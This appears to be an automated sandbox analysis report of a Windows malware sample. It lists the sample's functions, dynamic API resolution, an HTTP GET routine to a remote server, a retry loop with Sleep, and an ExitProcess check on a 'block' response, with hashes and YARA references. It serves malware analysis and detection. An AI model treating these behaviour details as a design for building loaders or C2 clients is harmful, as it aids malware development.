                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: e5dbef57d0068d093414532fd6c0ac36a25324f12e47e0f912bd8ddae78b2aa3
                              • Instruction ID: f4b7799cf2de66235715ce9fe44ee5e054a054ee50c7489c683480c2e10f8334
                              • Opcode Fuzzy Hash: e5dbef57d0068d093414532fd6c0ac36a25324f12e47e0f912bd8ddae78b2aa3
                              • Instruction Fuzzy Hash: 76F04FB1944208EBD714DFD9D949BAEFBB8EB04721F10026AFA45E3680C77815048BA1
                              Function 00FF1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: 340cec86ee11992f609fd50682c334543b8eb6182568feeb9111df1b11409f29
                              • Instruction ID: 75e2c38c1a4ebb43862d42e0ffdab99478c7aee38064e652801065dc0b7e1498
                              • Opcode Fuzzy Hash: 340cec86ee11992f609fd50682c334543b8eb6182568feeb9111df1b11409f29
                              • Instruction Fuzzy Hash: 48D05E7490030CDBCB14DFE0E88D6EDBB78FB08321F000564D906A3340EA315491CBA5
                              Function 01009C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GetProcAddress.KERNEL32(76210000,01975690), ref: 01009C2D
                              • GetProcAddress.KERNEL32(76210000,01975630), ref: 01009C45
                              • GetProcAddress.KERNEL32(76210000,01988FD0), ref: 01009C5E
                              • GetProcAddress.KERNEL32(76210000,01988FB8), ref: 01009C76
                              • GetProcAddress.KERNEL32(76210000,01989048), ref: 01009C8E
                              • GetProcAddress.KERNEL32(76210000,0198DDB0), ref: 01009CA7
                              • GetProcAddress.KERNEL32(76210000,0197A638), ref: 01009CBF
                              • GetProcAddress.KERNEL32(76210000,0198DC90), ref: 01009CD7
                              • GetProcAddress.KERNEL32(76210000,0198DC18), ref: 01009CF0
                              • GetProcAddress.KERNEL32(76210000,0198DBA0), ref: 01009D08
                              • GetProcAddress.KERNEL32(76210000,0198DCF0), ref: 01009D20
                              • GetProcAddress.KERNEL32(76210000,019756B0), ref: 01009D39
                              • GetProcAddress.KERNEL32(76210000,01975470), ref: 01009D51
                              • GetProcAddress.KERNEL32(76210000,01975430), ref: 01009D69
                              • GetProcAddress.KERNEL32(76210000,019756D0), ref: 01009D82
                              • GetProcAddress.KERNEL32(76210000,0198DD08), ref: 01009D9A
                              • GetProcAddress.KERNEL32(76210000,0198DD68), ref: 01009DB2
                              • GetProcAddress.KERNEL32(76210000,0197A840), ref: 01009DCB
                              • GetProcAddress.KERNEL32(76210000,019756F0), ref: 01009DE3
                              • GetProcAddress.KERNEL32(76210000,0198DD80), ref: 01009DFB
                              • GetProcAddress.KERNEL32(76210000,0198DD38), ref: 01009E14
                              • GetProcAddress.KERNEL32(76210000,0198DC00), ref: 01009E2C
                              • GetProcAddress.KERNEL32(76210000,0198DB28), ref: 01009E44
                              • GetProcAddress.KERNEL32(76210000,01975410), ref: 01009E5D
                              • GetProcAddress.KERNEL32(76210000,0198DCC0), ref: 01009E75
                              • GetProcAddress.KERNEL32(76210000,0198DC30), ref: 01009E8D
                              • GetProcAddress.KERNEL32(76210000,0198DBB8), ref: 01009EA6
                              • GetProcAddress.KERNEL32(76210000,0198DB10), ref: 01009EBE
                              • GetProcAddress.KERNEL32(76210000,0198DBE8), ref: 01009ED6
                              • GetProcAddress.KERNEL32(76210000,0198DCD8), ref: 01009EEF
                              • GetProcAddress.KERNEL32(76210000,0198DD20), ref: 01009F07
                              • GetProcAddress.KERNEL32(76210000,0198DBD0), ref: 01009F1F
                              • GetProcAddress.KERNEL32(76210000,0198DC48), ref: 01009F38
                              • GetProcAddress.KERNEL32(76210000,0197FC30), ref: 01009F50
                              • GetProcAddress.KERNEL32(76210000,0198DC60), ref: 01009F68
                              • GetProcAddress.KERNEL32(76210000,0198DC78), ref: 01009F81
                              • GetProcAddress.KERNEL32(76210000,01975370), ref: 01009F99
                              • GetProcAddress.KERNEL32(76210000,0198DB40), ref: 01009FB1
                              • GetProcAddress.KERNEL32(76210000,01975450), ref: 01009FCA
                              • GetProcAddress.KERNEL32(76210000,0198DD50), ref: 01009FE2
                              • GetProcAddress.KERNEL32(76210000,0198DCA8), ref: 01009FFA
                              • GetProcAddress.KERNEL32(76210000,01975390), ref: 0100A013
                              • GetProcAddress.KERNEL32(76210000,01975490), ref: 0100A02B
                              • LoadLibraryA.KERNEL32(0198DD98,?,01005CA3,01010AEB,?,?,?,?,?,?,?,?,?,?,01010AEA,01010AE3), ref: 0100A03D
                              • LoadLibraryA.KERNEL32(0198DAC8,?,01005CA3,01010AEB,?,?,?,?,?,?,?,?,?,?,01010AEA,01010AE3), ref: 0100A04E
                              • LoadLibraryA.KERNEL32(0198DAE0,?,01005CA3,01010AEB,?,?,?,?,?,?,?,?,?,?,01010AEA,01010AE3), ref: 0100A060
                              • LoadLibraryA.KERNEL32(0198DAF8,?,01005CA3,01010AEB,?,?,?,?,?,?,?,?,?,?,01010AEA,01010AE3), ref: 0100A072
                              • LoadLibraryA.KERNEL32(0198DB58,?,01005CA3,01010AEB,?,?,?,?,?,?,?,?,?,?,01010AEA,01010AE3), ref: 0100A083
                              • LoadLibraryA.KERNEL32(0198DB70,?,01005CA3,01010AEB,?,?,?,?,?,?,?,?,?,?,01010AEA,01010AE3), ref: 0100A095
                              • LoadLibraryA.KERNEL32(0198DB88,?,01005CA3,01010AEB,?,?,?,?,?,?,?,?,?,?,01010AEA,01010AE3), ref: 0100A0A7
                              • LoadLibraryA.KERNEL32(0198DEE8,?,01005CA3,01010AEB,?,?,?,?,?,?,?,?,?,?,01010AEA,01010AE3), ref: 0100A0B8
                              • GetProcAddress.KERNEL32(751E0000,01975190), ref: 0100A0DA
                              • GetProcAddress.KERNEL32(751E0000,0198DED0), ref: 0100A0F2
                              • GetProcAddress.KERNEL32(751E0000,01988AA0), ref: 0100A10A
                              • GetProcAddress.KERNEL32(751E0000,0198DDC8), ref: 0100A123
                              • GetProcAddress.KERNEL32(751E0000,01975090), ref: 0100A13B
                              • GetProcAddress.KERNEL32(700F0000,0197A778), ref: 0100A160
                              • GetProcAddress.KERNEL32(700F0000,019750D0), ref: 0100A179
                              • GetProcAddress.KERNEL32(700F0000,0197A868), ref: 0100A191
                              • GetProcAddress.KERNEL32(700F0000,0198DEB8), ref: 0100A1A9
                              • GetProcAddress.KERNEL32(700F0000,0198DF00), ref: 0100A1C2
                              • GetProcAddress.KERNEL32(700F0000,01975050), ref: 0100A1DA
                              • GetProcAddress.KERNEL32(700F0000,01975110), ref: 0100A1F2
                              • GetProcAddress.KERNEL32(700F0000,0198DF48), ref: 0100A20B
                              • GetProcAddress.KERNEL32(753A0000,01974F70), ref: 0100A22C
                              • GetProcAddress.KERNEL32(753A0000,01975070), ref: 0100A244
                              • GetProcAddress.KERNEL32(753A0000,0198DE28), ref: 0100A25D
                              • GetProcAddress.KERNEL32(753A0000,0198DEA0), ref: 0100A275
                              • GetProcAddress.KERNEL32(753A0000,019752F0), ref: 0100A28D
                              • GetProcAddress.KERNEL32(76310000,0197A6B0), ref: 0100A2B3
                              • GetProcAddress.KERNEL32(76310000,0197A688), ref: 0100A2CB
                              • GetProcAddress.KERNEL32(76310000,0198DE40), ref: 0100A2E3
                              • GetProcAddress.KERNEL32(76310000,01974F90), ref: 0100A2FC
                              • GetProcAddress.KERNEL32(76310000,01974FB0), ref: 0100A314
                              • GetProcAddress.KERNEL32(76310000,0197A7A0), ref: 0100A32C
                              • GetProcAddress.KERNEL32(76910000,0198DF78), ref: 0100A352
                              • GetProcAddress.KERNEL32(76910000,019750B0), ref: 0100A36A
                              • GetProcAddress.KERNEL32(76910000,019889E0), ref: 0100A382
                              • GetProcAddress.KERNEL32(76910000,0198DF18), ref: 0100A39B
                              • GetProcAddress.KERNEL32(76910000,0198DF30), ref: 0100A3B3
                              • GetProcAddress.KERNEL32(76910000,01975150), ref: 0100A3CB
                              • GetProcAddress.KERNEL32(76910000,019751B0), ref: 0100A3E4
                              • GetProcAddress.KERNEL32(76910000,0198DE58), ref: 0100A3FC
                              • GetProcAddress.KERNEL32(76910000,0198DDE0), ref: 0100A414
                              • GetProcAddress.KERNEL32(75B30000,01975210), ref: 0100A436
                              • GetProcAddress.KERNEL32(75B30000,0198DF60), ref: 0100A44E
                              • GetProcAddress.KERNEL32(75B30000,0198DDF8), ref: 0100A466
                              • GetProcAddress.KERNEL32(75B30000,0198DE10), ref: 0100A47F
                              • GetProcAddress.KERNEL32(75B30000,0198DE88), ref: 0100A497
                              • GetProcAddress.KERNEL32(75670000,01975030), ref: 0100A4B8
                              • GetProcAddress.KERNEL32(75670000,01975310), ref: 0100A4D1
                              • GetProcAddress.KERNEL32(76AC0000,01974F50), ref: 0100A4F2
                              • GetProcAddress.KERNEL32(76AC0000,0198DE70), ref: 0100A50A
                              • GetProcAddress.KERNEL32(6F4E0000,01975010), ref: 0100A530
                              • GetProcAddress.KERNEL32(6F4E0000,019751D0), ref: 0100A548
                              • GetProcAddress.KERNEL32(6F4E0000,019750F0), ref: 0100A560
                              • GetProcAddress.KERNEL32(6F4E0000,0198D930), ref: 0100A579
                              • GetProcAddress.KERNEL32(6F4E0000,019751F0), ref: 0100A591
                              • GetProcAddress.KERNEL32(6F4E0000,01975130), ref: 0100A5A9
                              • GetProcAddress.KERNEL32(6F4E0000,01975330), ref: 0100A5C2
                              • GetProcAddress.KERNEL32(6F4E0000,01975170), ref: 0100A5DA
                              • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 0100A5F1
                              • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 0100A607
                              • GetProcAddress.KERNEL32(75AE0000,0198D8B8), ref: 0100A629
                              • GetProcAddress.KERNEL32(75AE0000,01988A60), ref: 0100A641
                              • GetProcAddress.KERNEL32(75AE0000,0198DA08), ref: 0100A659
                              • GetProcAddress.KERNEL32(75AE0000,0198DA38), ref: 0100A672
                              • GetProcAddress.KERNEL32(76300000,01974FD0), ref: 0100A693
                              • GetProcAddress.KERNEL32(6FE20000,0198DA98), ref: 0100A6B4
                              • GetProcAddress.KERNEL32(6FE20000,01975230), ref: 0100A6CD
                              • GetProcAddress.KERNEL32(6FE20000,0198D810), ref: 0100A6E5
                              • GetProcAddress.KERNEL32(6FE20000,0198D828), ref: 0100A6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: d20b841e3ad0f8031ae4af4358d74b2f8cec80857a46497c4158f68b6372b2f9
                              • Instruction ID: 2f292149a59c23e1da8088875c000e3ef5e1a6eb6c3e79568e345f2aea2fde62
                              • Opcode Fuzzy Hash: d20b841e3ad0f8031ae4af4358d74b2f8cec80857a46497c4158f68b6372b2f9
                              • Instruction Fuzzy Hash: 67624CB5605200AFD36ADFA8F98CD6A3BF9F79C701314853AA68AC724CD7399441DF50
                              Function 00FF6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1033 ff6280-ff630b call 100a7a0 call ff47b0 call 100a740 InternetOpenA StrCmpCA 1040 ff630d 1033->1040 1041 ff6314-ff6318 1033->1041 1040->1041 1042 ff631e-ff6342 InternetConnectA 1041->1042 1043 ff6509-ff6525 call 100a7a0 call 100a800 * 2 1041->1043 1044 ff64ff-ff6503 InternetCloseHandle 1042->1044 1045 ff6348-ff634c 1042->1045 1061 ff6528-ff652d 1043->1061 1044->1043 1047 ff634e-ff6358 1045->1047 1048 ff635a 1045->1048 1050 ff6364-ff6392 HttpOpenRequestA 1047->1050 1048->1050 1052 ff6398-ff639c 1050->1052 1053 ff64f5-ff64f9 InternetCloseHandle 1050->1053 1055 ff639e-ff63bf InternetSetOptionA 1052->1055 1056 ff63c5-ff6405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1044 1055->1056 1058 ff642c-ff644b call 1008940 1056->1058 1059 ff6407-ff6427 call 100a740 call 100a800 * 2 1056->1059 1066 ff644d-ff6454 1058->1066 1067 ff64c9-ff64e9 call 100a740 call 100a800 * 2 1058->1067 1059->1061 1070 ff64c7-ff64ef InternetCloseHandle 1066->1070 1071 ff6456-ff6480 InternetReadFile 1066->1071 1067->1061 1070->1053 1074 ff648b 1071->1074 1075 ff6482-ff6489 1071->1075 1074->1070 1075->1074 1079 ff648d-ff64c5 call 100a9b0 call 100a8a0 call 100a800 1075->1079 1079->1071
                              APIs
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                                • Part of subcall function 00FF47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FF4839
                                • Part of subcall function 00FF47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FF4849
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                              • InternetOpenA.WININET(01010DFE,00000001,00000000,00000000,00000000), ref: 00FF62E1
                              • StrCmpCA.SHLWAPI(?,0198FB08), ref: 00FF6303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FF6335
                              • HttpOpenRequestA.WININET(00000000,GET,?,0198F400,00000000,00000000,00400100,00000000), ref: 00FF6385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FF63BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FF63D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00FF63FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FF646D
                              • InternetCloseHandle.WININET(00000000), ref: 00FF64EF
                              • InternetCloseHandle.WININET(00000000), ref: 00FF64F9
                              • InternetCloseHandle.WININET(00000000), ref: 00FF6503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: cccd747bb6817ff3072581685d19eac6d02bf95fa59abc939e59c246028636a7
                              • Instruction ID: c03137201ba77b59a442d3728bb3a2feb67cb4d1a63fa8ce64270c37a71e0ceb
                              • Opcode Fuzzy Hash: cccd747bb6817ff3072581685d19eac6d02bf95fa59abc939e59c246028636a7
                              • Instruction Fuzzy Hash: B4713F71A00318EBEB25EBA0DC48FEE7774BF54700F108159E24AAB1D4DBB46A85DF51
                              Function 01005510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1090 1005510-1005577 call 1005ad0 call 100a820 * 3 call 100a740 * 4 1106 100557c-1005583 1090->1106 1107 1005585-10055b6 call 100a820 call 100a7a0 call ff1590 call 10051f0 1106->1107 1108 10055d7-100564c call 100a740 * 2 call ff1590 call 10052c0 call 100a8a0 call 100a800 call 100aad0 StrCmpCA 1106->1108 1124 10055bb-10055d2 call 100a8a0 call 100a800 1107->1124 1134 1005693-10056a9 call 100aad0 StrCmpCA 1108->1134 1138 100564e-100568e call 100a7a0 call ff1590 call 10051f0 call 100a8a0 call 100a800 1108->1138 1124->1134 1139 10057dc-1005844 call 100a8a0 call 100a820 * 2 call ff1670 call 100a800 * 4 call 1006560 call ff1550 1134->1139 1140 10056af-10056b6 1134->1140 1138->1134 1270 1005ac3-1005ac6 1139->1270 1143 10057da-100585f call 100aad0 StrCmpCA 1140->1143 1144 10056bc-10056c3 1140->1144 1163 1005991-10059f9 call 100a8a0 call 100a820 * 2 call ff1670 call 100a800 * 4 call 1006560 call ff1550 1143->1163 1164 1005865-100586c 1143->1164 1148 10056c5-1005719 call 100a820 call 100a7a0 call ff1590 call 10051f0 call 100a8a0 call 100a800 1144->1148 1149 100571e-1005793 call 100a740 * 2 call ff1590 call 10052c0 call 100a8a0 call 100a800 call 100aad0 StrCmpCA 1144->1149 1148->1143 1149->1143 1249 1005795-10057d5 call 100a7a0 call ff1590 call 10051f0 call 100a8a0 call 100a800 1149->1249 1163->1270 1170 1005872-1005879 1164->1170 1171 100598f-1005a14 call 100aad0 StrCmpCA 1164->1171 1178 10058d3-1005948 call 100a740 * 2 call ff1590 call 10052c0 call 100a8a0 call 100a800 call 100aad0 StrCmpCA 1170->1178 1179 100587b-10058ce call 100a820 call 100a7a0 call ff1590 call 10051f0 call 100a8a0 call 100a800 1170->1179 1199 1005a16-1005a21 Sleep 1171->1199 1200 1005a28-1005a91 call 100a8a0 call 100a820 * 2 call ff1670 call 100a800 * 4 call 1006560 call ff1550 1171->1200 1178->1171 1275 100594a-100598a call 100a7a0 call ff1590 call 10051f0 call 100a8a0 call 100a800 1178->1275 1179->1171 1199->1106 1200->1270 1249->1143 1275->1171
                              APIs
                                • Part of subcall function 0100A820: lstrlen.KERNEL32(00FF4F05,?,?,00FF4F05,01010DDE), ref: 0100A82B
                                • Part of subcall function 0100A820: lstrcpy.KERNEL32(01010DDE,00000000), ref: 0100A885
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 01005644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 010056A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 01005857
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                                • Part of subcall function 010051F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 01005228
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                                • Part of subcall function 010052C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 01005318
                                • Part of subcall function 010052C0: lstrlen.KERNEL32(00000000), ref: 0100532F
                                • Part of subcall function 010052C0: StrStrA.SHLWAPI(00000000,00000000), ref: 01005364
                                • Part of subcall function 010052C0: lstrlen.KERNEL32(00000000), ref: 01005383
                                • Part of subcall function 010052C0: lstrlen.KERNEL32(00000000), ref: 010053AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0100578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 01005940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 01005A0C
                              • Sleep.KERNEL32(0000EA60), ref: 01005A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 4841124f8ac9662d2de1ed54c3717b9ef2b30f297346cfd814589a8544febb01
                              • Instruction ID: 27c3c0263659fabea48d408aa1d6b85ab95f46196f82b2483299c3870b15b2f4
                              • Opcode Fuzzy Hash: 4841124f8ac9662d2de1ed54c3717b9ef2b30f297346cfd814589a8544febb01
                              • Instruction Fuzzy Hash: 3DE11171A10209DAEB16FBA0EC55EFD7378BF64200F408568A587970D4EF356B4DCBA1
                              Function 010017A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1301 10017a0-10017cd call 100aad0 StrCmpCA 1304 10017d7-10017f1 call 100aad0 1301->1304 1305 10017cf-10017d1 ExitProcess 1301->1305 1309 10017f4-10017f8 1304->1309 1310 10019c2-10019cd call 100a800 1309->1310 1311 10017fe-1001811 1309->1311 1313 1001817-100181a 1311->1313 1314 100199e-10019bd 1311->1314 1316 1001821-1001830 call 100a820 1313->1316 1317 1001849-1001858 call 100a820 1313->1317 1318 10018ad-10018be StrCmpCA 1313->1318 1319 10018cf-10018e0 StrCmpCA 1313->1319 1320 100198f-1001999 call 100a820 1313->1320 1321 1001970-1001981 StrCmpCA 1313->1321 1322 10018f1-1001902 StrCmpCA 1313->1322 1323 1001951-1001962 StrCmpCA 1313->1323 1324 1001932-1001943 StrCmpCA 1313->1324 1325 1001913-1001924 StrCmpCA 1313->1325 1326 1001835-1001844 call 100a820 1313->1326 1327 100185d-100186e StrCmpCA 1313->1327 1328 100187f-1001890 StrCmpCA 1313->1328 1314->1309 1316->1314 1317->1314 1334 10018c0-10018c3 1318->1334 1335 10018ca 1318->1335 1336 10018e2-10018e5 1319->1336 1337 10018ec 1319->1337 1320->1314 1347 1001983-1001986 1321->1347 1348 100198d 1321->1348 1338 1001904-1001907 1322->1338 1339 100190e 1322->1339 1344 1001964-1001967 1323->1344 1345 100196e 1323->1345 1342 1001945-1001948 1324->1342 1343 100194f 1324->1343 1340 1001930 1325->1340 1341 1001926-1001929 1325->1341 1326->1314 1330 1001870-1001873 1327->1330 1331 100187a 1327->1331 1332 1001892-100189c 1328->1332 1333 100189e-10018a1 1328->1333 1330->1331 1331->1314 1352 10018a8 1332->1352 1333->1352 1334->1335 1335->1314 1336->1337 1337->1314 1338->1339 1339->1314 1340->1314 1341->1340 1342->1343 1343->1314 1344->1345 1345->1314 1347->1348 1348->1314 1352->1314
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 010017C5
                              • ExitProcess.KERNEL32 ref: 010017D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
